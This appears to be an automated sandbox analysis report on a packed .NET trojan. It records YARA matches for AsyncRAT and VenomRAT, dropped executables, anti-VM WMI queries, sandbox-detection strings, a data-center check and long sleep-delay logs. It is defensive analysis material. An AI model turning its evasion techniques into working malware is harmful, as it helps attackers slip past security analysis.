
Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Loaader.exe.3.dr	Binary or memory string: SBIEDLL.DLLM{860BB310-5D01-11D0-BD3B-00A0C911CE86}
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Memory allocated: 1A910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory allocated: A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory allocated: 1A5E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Memory allocated: 770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Memory allocated: 1A300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 4ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 56E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 5520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 66E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 76E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 7B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 8B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 9B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 1AB80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: 16A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: 1B140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: 1A8C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 15F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 1B070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 14E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 2E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 4E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 5570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 6570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 66A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 76A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 79F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 89F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 1130000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 4C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 5350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 6350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 6480000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 7480000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 78D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 88D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 98D0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599524	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598556	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598433	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598323	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597320	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596604	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596270	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 593075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592785	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592507	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592367	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591789	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591993
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599612
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599476
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598845
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 6116	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 2999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loader.exe	Window / User API: threadDelayed 9489
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Window / User API: threadDelayed 8044
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Window / User API: threadDelayed 1770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 8122
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 1610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9527
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 9073
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9149
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 575
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8305
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 606

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe TID: 6556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 5340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe TID: 2828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599524s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598826s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598556s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598433s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598323s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598090s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597745s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597320s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596948s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596604s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596270s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595684s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99866s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99745s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99628s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99389s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99280s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99171s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -98937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99793s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99647s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99210s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -98874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -593075s >= -30000s	Jump to behavior
